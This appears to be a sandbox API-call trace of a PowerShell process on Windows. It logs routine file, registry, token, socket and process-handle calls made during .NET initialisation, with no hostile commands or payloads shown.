	[0186.504] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\Config\\machine.config", nBufferLength=0x105, lpBuffer=0x5f6e528, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\Config\\machine.config", lpFilePart=0x0) returned 0x43
	[0186.504] GetLastError () returned 0x0
	[0186.507] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework\\v2.0.50727\\config\\machine.config"), fInfoLevelId=0x0, lpFileInformation=0x5f6ea0c | out: lpFileInformation=0x5f6ea0c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdf973529, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xdf973529, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0xc2c74ba0, ftLastWriteTime.dwHighDateTime=0x1d301bd, nFileSizeHigh=0x0, nFileSizeLow=0x60ed)) returned 1
	[0186.507] GetLastError () returned 0x0
	[0186.507] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\Config\\machine.config", nBufferLength=0x105, lpBuffer=0x5f6e474, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\Config\\machine.config", lpFilePart=0x0) returned 0x43
	[0186.507] GetLastError () returned 0x0
	[0186.508] SetErrorMode (uMode=0x1) returned 0x1
	[0186.508] CreateFileW (lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework\\v2.0.50727\\config\\machine.config"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x3bc
	[0186.508] GetLastError () returned 0x0
	[0186.508] GetFileType (hFile=0x3bc) returned 0x1
	[0186.508] SetErrorMode (uMode=0x1) returned 0x1
	[0186.508] GetFileType (hFile=0x3bc) returned 0x1
	[0186.512] GetFileSize (in: hFile=0x3bc, lpFileSizeHigh=0x5f6e9e0 | out: lpFileSizeHigh=0x5f6e9e0*=0x0) returned 0x60ed
	[0186.512] GetLastError () returned 0x0
	[0186.512] ReadFile (in: hFile=0x3bc, lpBuffer=0x2af2634, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5f6e998, lpOverlapped=0x0 | out: lpBuffer=0x2af2634*, lpNumberOfBytesRead=0x5f6e998*=0x1000, lpOverlapped=0x0) returned 1
	[0186.514] GetLastError () returned 0x0
	[0186.521] ReadFile (in: hFile=0x3bc, lpBuffer=0x2af2634, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5f6e650, lpOverlapped=0x0 | out: lpBuffer=0x2af2634*, lpNumberOfBytesRead=0x5f6e650*=0x1000, lpOverlapped=0x0) returned 1
	[0186.521] GetLastError () returned 0x0
	[0186.523] ReadFile (in: hFile=0x3bc, lpBuffer=0x2af2634, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5f6e650, lpOverlapped=0x0 | out: lpBuffer=0x2af2634*, lpNumberOfBytesRead=0x5f6e650*=0x1000, lpOverlapped=0x0) returned 1
	[0186.523] GetLastError () returned 0x0
	[0186.523] ReadFile (in: hFile=0x3bc, lpBuffer=0x2af2634, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5f6e650, lpOverlapped=0x0 | out: lpBuffer=0x2af2634*, lpNumberOfBytesRead=0x5f6e650*=0x1000, lpOverlapped=0x0) returned 1
	[0186.523] GetLastError () returned 0x0
	[0186.523] ReadFile (in: hFile=0x3bc, lpBuffer=0x2af2634, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5f6e650, lpOverlapped=0x0 | out: lpBuffer=0x2af2634*, lpNumberOfBytesRead=0x5f6e650*=0x1000, lpOverlapped=0x0) returned 1
	[0186.523] GetLastError () returned 0x0
	[0186.528] ReadFile (in: hFile=0x3bc, lpBuffer=0x2af2634, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5f6e784, lpOverlapped=0x0 | out: lpBuffer=0x2af2634*, lpNumberOfBytesRead=0x5f6e784*=0x1000, lpOverlapped=0x0) returned 1
	[0186.528] GetLastError () returned 0x0
	[0186.528] ReadFile (in: hFile=0x3bc, lpBuffer=0x2af2634, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5f6e618, lpOverlapped=0x0 | out: lpBuffer=0x2af2634*, lpNumberOfBytesRead=0x5f6e618*=0xed, lpOverlapped=0x0) returned 1
	[0186.529] GetLastError () returned 0x0
	[0186.529] ReadFile (in: hFile=0x3bc, lpBuffer=0x2af2634, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5f6e6d0, lpOverlapped=0x0 | out: lpBuffer=0x2af2634*, lpNumberOfBytesRead=0x5f6e6d0*=0x0, lpOverlapped=0x0) returned 1
	[0186.529] GetLastError () returned 0x0
	[0186.594] CloseHandle (hObject=0x3bc) returned 1
	[0186.594] GetLastError () returned 0x0
	[0186.687] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x5f6e884, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0186.687] GetLastError () returned 0x0
	[0186.687] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x5f6e838, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0186.687] GetLastError () returned 0x0
	[0186.688] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x6301e8, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39
	[0186.688] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe", nBufferLength=0x105, lpBuffer=0x5f6e8bc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe", lpFilePart=0x0) returned 0x39
	[0186.688] GetLastError () returned 0x0
	[0186.691] GetCurrentProcess () returned 0xffffffff
	[0186.691] GetLastError () returned 0x3f0
	[0186.691] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x5f6ec60 | out: TokenHandle=0x5f6ec60*=0x3bc) returned 1
	[0186.691] GetLastError () returned 0x3f0
	[0186.693] GetCurrentProcess () returned 0xffffffff
	[0186.693] GetLastError () returned 0x3f0
	[0186.693] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x5f6ec60 | out: TokenHandle=0x5f6ec60*=0x3b8) returned 1
	[0186.693] GetLastError () returned 0x3f0
	[0186.695] GetCurrentProcess () returned 0xffffffff
	[0186.695] GetLastError () returned 0x3f0
	[0186.696] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x5f6e9d0 | out: TokenHandle=0x5f6e9d0*=0x320) returned 1
	[0186.696] GetLastError () returned 0x3f0
	[0186.696] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.config" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershell.config"), fInfoLevelId=0x0, lpFileInformation=0x5f6ea10 | out: lpFileInformation=0x5f6ea10*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0186.696] GetLastError () returned 0x2
	[0186.696] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x5f6e528, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0186.696] GetLastError () returned 0x2
	[0186.697] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.config" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershell.config"), fInfoLevelId=0x0, lpFileInformation=0x5f6ea0c | out: lpFileInformation=0x5f6ea0c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0186.697] GetLastError () returned 0x2
	[0186.697] GetCurrentProcess () returned 0xffffffff
	[0186.697] GetLastError () returned 0x3f0
	[0186.697] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x5f6ec60 | out: TokenHandle=0x5f6ec60*=0x388) returned 1
	[0186.698] GetLastError () returned 0x3f0
	[0186.698] GetCurrentProcess () returned 0xffffffff
	[0186.698] GetLastError () returned 0x3f0
	[0186.699] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x5f6ec60 | out: TokenHandle=0x5f6ec60*=0x38c) returned 1
	[0186.699] GetLastError () returned 0x3f0
	[0186.954] GetCurrentProcess () returned 0xffffffff
	[0186.954] GetLastError () returned 0x3f0
	[0186.954] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x5f6ea3c | out: TokenHandle=0x5f6ea3c*=0x390) returned 1
	[0186.954] GetLastError () returned 0x3f0
	[0186.989] GetCurrentProcess () returned 0xffffffff
	[0186.989] GetLastError () returned 0x3f0
	[0186.989] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x5f6ea4c | out: TokenHandle=0x5f6ea4c*=0x394) returned 1
	[0186.989] GetLastError () returned 0x3f0
	[0187.053] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x398
	[0187.053] GetLastError () returned 0x0
	[0187.053] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x39c
	[0187.053] GetLastError () returned 0x0
	[0187.082] GetCurrentProcess () returned 0xffffffff
	[0187.082] GetLastError () returned 0x3f0
	[0187.082] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x5f6ea30 | out: TokenHandle=0x5f6ea30*=0x3a0) returned 1
	[0187.082] GetLastError () returned 0x3f0
	[0187.087] GetCurrentProcess () returned 0xffffffff
	[0187.088] GetLastError () returned 0x3f0
	[0187.088] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x5f6ea40 | out: TokenHandle=0x5f6ea40*=0x3c0) returned 1
	[0187.088] GetLastError () returned 0x3f0
	[0187.101] GetCurrentProcess () returned 0xffffffff
	[0187.101] GetLastError () returned 0x3f0
	[0187.101] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x5f6ea04 | out: TokenHandle=0x5f6ea04*=0x3a4) returned 1
	[0187.101] GetLastError () returned 0x3f0
	[0187.103] GetCurrentProcess () returned 0xffffffff
	[0187.103] GetLastError () returned 0x3f0
	[0187.103] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x5f6ea14 | out: TokenHandle=0x5f6ea14*=0x3c8) returned 1
	[0187.104] GetLastError () returned 0x3f0
	[0187.107] GetCurrentProcess () returned 0xffffffff
	[0187.107] GetLastError () returned 0x3f0
	[0187.107] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x5f6ed08 | out: TokenHandle=0x5f6ed08*=0x3cc) returned 1
	[0187.185] GetLastError () returned 0x3f0
	[0187.233] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion", ulOptions=0x0, samDesired=0x20019, phkResult=0x5f6dd68 | out: phkResult=0x5f6dd68*=0x3d0) returned 0x0
	[0187.233] RegQueryValueExW (in: hKey=0x3d0, lpValueName="InstallationType", lpReserved=0x0, lpType=0x5f6ddb0, lpData=0x0, lpcbData=0x5f6ddac*=0x0 | out: lpType=0x5f6ddb0*=0x1, lpData=0x0, lpcbData=0x5f6ddac*=0xe) returned 0x0
	[0187.233] RegQueryValueExW (in: hKey=0x3d0, lpValueName="InstallationType", lpReserved=0x0, lpType=0x5f6ddb0, lpData=0x628ea0, lpcbData=0x5f6ddac*=0xe | out: lpType=0x5f6ddb0*=0x1, lpData="Client", lpcbData=0x5f6ddac*=0xe) returned 0x0
	[0187.234] RegCloseKey (hKey=0x3d0) returned 0x0
	[0187.293] RasEnumConnectionsW (in: param_1=0x631588, param_2=0x5f6ed80, param_3=0x5f6ed84 | out: param_1=0x631588, param_2=0x5f6ed80, param_3=0x5f6ed84) returned 0x0
	[0187.754] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x628ea0 | out: lpWSAData=0x628ea0) returned 0
	[0187.782] GetLastError () returned 0x0
	[0187.789] WSASocketW (af=2, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x0) returned 0x41c
	[0188.216] GetLastError () returned 0x0
	[0188.216] setsockopt (s=0x41c, level=65535, optname=128, optval="\x01", optlen=4) returned -1
	[0188.216] GetLastError () returned 0x273a
	[0188.216] closesocket (s=0x41c) returned 0
	[0188.216] GetLastError () returned 0x0
	[0188.216] WSASocketW (af=23, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x0) returned 0x41c
	[0188.295] GetLastError () returned 0x0
	[0188.295] setsockopt (s=0x41c, level=65535, optname=128, optval="\x01", optlen=4) returned -1
	[0188.295] GetLastError () returned 0x273a
	[0188.295] closesocket (s=0x41c) returned 0
	[0188.296] GetLastError () returned 0x0
	[0188.301] GetCurrentProcess () returned 0xffffffff
	[0188.301] GetLastError () returned 0x3f0
	[0188.301] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x5f6e8ec | out: TokenHandle=0x5f6e8ec*=0x41c) returned 1
	[0188.301] GetLastError () returned 0x3f0
	[0188.307] GetCurrentProcess () returned 0xffffffff
	[0188.307] GetLastError () returned 0x3f0
	[0188.307] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x5f6e8fc | out: TokenHandle=0x5f6e8fc*=0x420) returned 1
	[0188.307] GetLastError () returned 0x3f0
	[0188.331] GetCurrentProcessId () returned 0xb30
	[0188.333] GetComputerNameW (in: lpBuffer=0x631588, nSize=0x2b1389c | out: lpBuffer="XDUWTFONO", nSize=0x2b1389c) returned 1
	[0188.334] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\.NET CLR Networking\\Performance", ulOptions=0x0, samDesired=0x20019, phkResult=0x5f6eb50 | out: phkResult=0x5f6eb50*=0x424) returned 0x0
	[0188.335] RegQueryValueExW (in: hKey=0x424, lpValueName="Library", lpReserved=0x0, lpType=0x5f6eb98, lpData=0x0, lpcbData=0x5f6eb94*=0x0 | out: lpType=0x5f6eb98*=0x1, lpData=0x0, lpcbData=0x5f6eb94*=0x1c) returned 0x0
	[0188.335] RegQueryValueExW (in: hKey=0x424, lpValueName="Library", lpReserved=0x0, lpType=0x5f6eb98, lpData=0x628ea0, lpcbData=0x5f6eb94*=0x1c | out: lpType=0x5f6eb98*=0x1, lpData="netfxperf.dll", lpcbData=0x5f6eb94*=0x1c) returned 0x0
	[0188.335] RegQueryValueExW (in: hKey=0x424, lpValueName="IsMultiInstance", lpReserved=0x0, lpType=0x5f6eb98, lpData=0x0, lpcbData=0x5f6eb94*=0x0 | out: lpType=0x5f6eb98*=0x4, lpData=0x0, lpcbData=0x5f6eb94*=0x4) returned 0x0
	[0188.336] RegQueryValueExW (in: hKey=0x424, lpValueName="IsMultiInstance", lpReserved=0x0, lpType=0x5f6eb98, lpData=0x5f6eb84, lpcbData=0x5f6eb94*=0x4 | out: lpType=0x5f6eb98*=0x4, lpData=0x5f6eb84*=0x1, lpcbData=0x5f6eb94*=0x4) returned 0x0
	[0188.337] RegQueryValueExW (in: hKey=0x424, lpValueName="First Counter", lpReserved=0x0, lpType=0x5f6eb98, lpData=0x0, lpcbData=0x5f6eb94*=0x0 | out: lpType=0x5f6eb98*=0x4, lpData=0x0, lpcbData=0x5f6eb94*=0x4) returned 0x0
	[0188.337] RegQueryValueExW (in: hKey=0x424, lpValueName="First Counter", lpReserved=0x0, lpType=0x5f6eb98, lpData=0x5f6eb84, lpcbData=0x5f6eb94*=0x4 | out: lpType=0x5f6eb98*=0x4, lpData=0x5f6eb84*=0x137a, lpcbData=0x5f6eb94*=0x4) returned 0x0
	[0188.337] RegCloseKey (hKey=0x424) returned 0x0
	[0188.339] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\.net clr networking\\Performance", ulOptions=0x0, samDesired=0x20019, phkResult=0x5f6eb4c | out: phkResult=0x5f6eb4c*=0x424) returned 0x0
	[0188.339] RegQueryValueExW (in: hKey=0x424, lpValueName="CategoryOptions", lpReserved=0x0, lpType=0x5f6eb94, lpData=0x0, lpcbData=0x5f6eb90*=0x0 | out: lpType=0x5f6eb94*=0x4, lpData=0x0, lpcbData=0x5f6eb90*=0x4) returned 0x0
	[0188.339] RegQueryValueExW (in: hKey=0x424, lpValueName="CategoryOptions", lpReserved=0x0, lpType=0x5f6eb94, lpData=0x5f6eb80, lpcbData=0x5f6eb90*=0x4 | out: lpType=0x5f6eb94*=0x4, lpData=0x5f6eb80*=0x3, lpcbData=0x5f6eb90*=0x4) returned 0x0
	[0188.339] RegQueryValueExW (in: hKey=0x424, lpValueName="FileMappingSize", lpReserved=0x0, lpType=0x5f6eb94, lpData=0x0, lpcbData=0x5f6eb90*=0x0 | out: lpType=0x5f6eb94*=0x4, lpData=0x0, lpcbData=0x5f6eb90*=0x4) returned 0x0
	[0188.339] RegQueryValueExW (in: hKey=0x424, lpValueName="FileMappingSize", lpReserved=0x0, lpType=0x5f6eb94, lpData=0x5f6eb80, lpcbData=0x5f6eb90*=0x4 | out: lpType=0x5f6eb94*=0x4, lpData=0x5f6eb80*=0x20000, lpcbData=0x5f6eb90*=0x4) returned 0x0
	[0188.434] RegQueryValueExW (in: hKey=0x424, lpValueName="Counter Names", lpReserved=0x0, lpType=0x5f6eb94, lpData=0x0, lpcbData=0x5f6eb90*=0x0 | out: lpType=0x5f6eb94*=0x3, lpData=0x0, lpcbData=0x5f6eb90*=0xaa) returned 0x0
	[0188.434] RegQueryValueExW (in: hKey=0x424, lpValueName="Counter Names", lpReserved=0x0, lpType=0x5f6eb94, lpData=0x2b15fe0, lpcbData=0x5f6eb90*=0xaa | out: lpType=0x5f6eb94*=0x3, lpData=0x2b15fe0*, lpcbData=0x5f6eb90*=0xaa) returned 0x0
	[0188.439] ConvertStringSecurityDescriptorToSecurityDescriptorW () returned 0x1
	[0188.441] GetLastError () returned 0x0
	[0188.444] CreateFileMappingW (hFile=0xffffffff, lpFileMappingAttributes=0x628ed0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x20000, lpName="Global\\netfxcustomperfcounters.1.0.net clr networking") returned 0x0
	[0188.445] GetLastError () returned 0x5
	[0188.447] OpenFileMappingW (dwDesiredAccess=0x2, bInheritHandle=0, lpName="Global\\netfxcustomperfcounters.1.0.net clr networking") returned 0x42c
	[0188.447] GetLastError () returned 0x5
	[0188.450] VirtualQuery (in: lpAddress=0x52f0000, lpBuffer=0x5f6eb64, dwLength=0x1c | out: lpBuffer=0x5f6eb64*(BaseAddress=0x52f0000, AllocationBase=0x52f0000, AllocationProtect=0x4, RegionSize=0x20000, State=0x1000, Protect=0x4, Type=0x40000)) returned 0x1c
	[0188.450] GetLastError () returned 0x5
	[0188.450] LocalFree (hMem=0x61f418) returned 0x0
	[0188.450] RegCloseKey (hKey=0x424) returned 0x0
	[0188.451] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2b16a5c, cbSid=0x5f6eb44 | out: pSid=0x2b16a5c*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x5f6eb44) returned 1
	[0188.451] GetLastError () returned 0x5
	[0188.452] CreateMutexW (lpMutexAttributes=0x2b16b94, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x0
	[0188.452] GetLastError () returned 0x5
	[0188.452] OpenMutexW (dwDesiredAccess=0x100001, bInheritHandle=0, lpName="Global\\.net clr networking") returned 0x424
	[0188.452] GetLastError () returned 0x5
	[0188.453] WaitForSingleObject (hHandle=0x424, dwMilliseconds=0x1f4) returned 0x0
	[0188.465] GetLastError () returned 0x5
	[0188.465] GetCurrentProcessId () returned 0xb30
	[0188.466] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb30) returned 0x430
	[0188.466] GetLastError () returned 0x5
	[0188.468] GetProcessTimes (in: hProcess=0x430, lpCreationTime=0x5f6eaac, lpExitTime=0x5f6eaa4, lpKernelTime=0x5f6eaa4, lpUserTime=0x5f6eaa4 | out: lpCreationTime=0x5f6eaac, lpExitTime=0x5f6eaa4, lpKernelTime=0x5f6eaa4, lpUserTime=0x5f6eaa4) returned 1
	[0188.468] GetLastError () returned 0x5
	[0188.470] CloseHandle (hObject=0x430) returned 1
	[0188.470] GetLastError () returned 0x5
	[0188.470] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x888) returned 0x430
	[0188.471] GetLastError () returned 0x5
	[0188.471] GetProcessTimes (in: hProcess=0x430, lpCreationTime=0x5f6eafc, lpExitTime=0x5f6eaf4, lpKernelTime=0x5f6eaf4, lpUserTime=0x5f6eaf4 | out: lpCreationTime=0x5f6eafc, lpExitTime=0x5f6eaf4, lpKernelTime=0x5f6eaf4, lpUserTime=0x5f6eaf4) returned 1
	[0188.471] GetLastError () returned 0x5
	[0188.472] CloseHandle (hObject=0x430) returned 1
	[0188.472] GetLastError () returned 0x5
	[0188.472] OpenProcess (dwDesiredAccess=0x100000, bInheritHandle=0, dwProcessId=0x888) returned 0x430
	[0188.472] GetLastError () returned 0x5
	[0188.472] GetCurrentProcess () returned 0xffffffff
	[0188.472] GetLastError () returned 0x5
	[0188.472] GetCurrentProcess () returned 0xffffffff
	[0188.472] GetLastError () returned 0x5
	[0188.476] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x430, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x5f6ea5c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x5f6ea5c*=0x434) returned 1
	[0188.476] GetLastError () returned 0x5
	[0188.479] CloseHandle (hObject=0x434) returned 1
	[0188.479] GetLastError () returned 0x5
	[0188.521] CloseHandle (hObject=0x430) returned 1
	[0188.521] GetLastError () returned 0x5
	[0188.521] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x708) returned 0x430
	[0188.521] GetLastError () returned 0x5
	[0188.521] GetProcessTimes (in: hProcess=0x430, lpCreationTime=0x5f6eafc, lpExitTime=0x5f6eaf4, lpKernelTime=0x5f6eaf4, lpUserTime=0x5f6eaf4 | out: lpCreationTime=0x5f6eafc, lpExitTime=0x5f6eaf4, lpKernelTime=0x5f6eaf4, lpUserTime=0x5f6eaf4) returned 1
	[0188.521] GetLastError () returned 0x5
	[0188.521] CloseHandle (hObject=0x430) returned 1
	[0188.521] GetLastError () returned 0x5
	[0188.521] OpenProcess (dwDesiredAccess=0x100000, bInheritHandle=0, dwProcessId=0x708) returned 0x430
	[0188.521] GetLastError () returned 0x5
	[0188.521] GetCurrentProcess () returned 0xffffffff
	[0188.521] GetLastError () returned 0x5
	[0188.521] GetCurrentProcess () returned 0xffffffff
	[0188.521] GetLastError () returned 0x5
	[0188.522] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x430, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x5f6ea5c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x5f6ea5c*=0x434) returned 1
	[0188.522] GetLastError () returned 0x5
	[0188.522] CloseHandle (hObject=0x434) returned 1
	[0188.522] GetLastError () returned 0x5
	[0188.522] CloseHandle (hObject=0x430) returned 1
	[0188.522] GetLastError () returned 0x5
	[0188.522] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x120) returned 0x430
	[0188.522] GetLastError () returned 0x5
	[0188.522] GetProcessTimes (in: hProcess=0x430, lpCreationTime=0x5f6eafc, lpExitTime=0x5f6eaf4, lpKernelTime=0x5f6eaf4, lpUserTime=0x5f6eaf4 | out: lpCreationTime=0x5f6eafc, lpExitTime=0x5f6eaf4, lpKernelTime=0x5f6eaf4, lpUserTime=0x5f6eaf4) returned 1
	[0188.522] GetLastError () returned 0x5
	[0188.523] CloseHandle (hObject=0x430) returned 1
	[0188.523] GetLastError () returned 0x5
	[0188.523] OpenProcess (dwDesiredAccess=0x100000, bInheritHandle=0, dwProcessId=0x120) returned 0x430
	[0188.523] GetLastError () returned 0x5
	[0188.523] GetCurrentProcess () returned 0xffffffff
	[0188.523] GetLastError () returned 0x5
	[0188.523] GetCurrentProcess () returned 0xffffffff
	[0188.523] GetLastError () returned 0x5
	[0188.523] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x430, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x5f6ea5c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x5f6ea5c*=0x434) returned 1
	[0188.523] GetLastError () returned 0x5
	[0188.523] CloseHandle (hObject=0x434) returned 1
	[0188.523] GetLastError () returned 0x5
	[0188.524] CloseHandle (hObject=0x430) returned 1
	[0188.524] GetLastError () returned 0x5
	[0188.524] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xaa0) returned 0x430
	[0188.524] GetLastError () returned 0x5
	[0188.524] GetProcessTimes (in: hProcess=0x430, lpCreationTime=0x5f6eafc, lpExitTime=0x5f6eaf4, lpKernelTime=0x5f6eaf4, lpUserTime=0x5f6eaf4 | out: lpCreationTime=0x5f6eafc, lpExitTime=0x5f6eaf4, lpKernelTime=0x5f6eaf4, lpUserTime=0x5f6eaf4) returned 1
	[0188.524] GetLastError () returned 0x5
	[0188.524] CloseHandle (hObject=0x430) returned 1
	[0188.524] GetLastError () returned 0x5
	[0188.524] OpenProcess (dwDesiredAccess=0x100000, bInheritHandle=0, dwProcessId=0xaa0) returned 0x430
	[0188.524] GetLastError () returned 0x5
	[0188.524] GetCurrentProcess () returned 0xffffffff
	[0188.524] GetLastError () returned 0x5
	[0188.524] GetCurrentProcess () returned 0xffffffff
	[0188.524] GetLastError () returned 0x5
	[0188.524] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x430, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x5f6ea5c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x5f6ea5c*=0x434) returned 1
	[0188.524] GetLastError () returned 0x5
	[0188.525] CloseHandle (hObject=0x434) returned 1
	[0188.525] GetLastError () returned 0x5
	[0188.525] CloseHandle (hObject=0x430) returned 1
	[0188.525] GetLastError () returned 0x5
	[0188.525] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x808) returned 0x430
	[0188.525] GetLastError () returned 0x5
	[0188.525] GetProcessTimes (in: hProcess=0x430, lpCreationTime=0x5f6eafc, lpExitTime=0x5f6eaf4, lpKernelTime=0x5f6eaf4, lpUserTime=0x5f6eaf4 | out: lpCreationTime=0x5f6eafc, lpExitTime=0x5f6eaf4, lpKernelTime=0x5f6eaf4, lpUserTime=0x5f6eaf4) returned 1
	[0188.525] GetLastError () returned 0x5
	[0188.525] CloseHandle (hObject=0x430) returned 1
	[0188.526] GetLastError () returned 0x5
	[0188.526] OpenProcess (dwDesiredAccess=0x100000, bInheritHandle=0, dwProcessId=0x808) returned 0x430
	[0188.526] GetLastError () returned 0x5
	[0188.526] GetCurrentProcess () returned 0xffffffff
	[0188.526] GetLastError () returned 0x5
	[0188.526] GetCurrentProcess () returned 0xffffffff
	[0188.526] GetLastError () returned 0x5
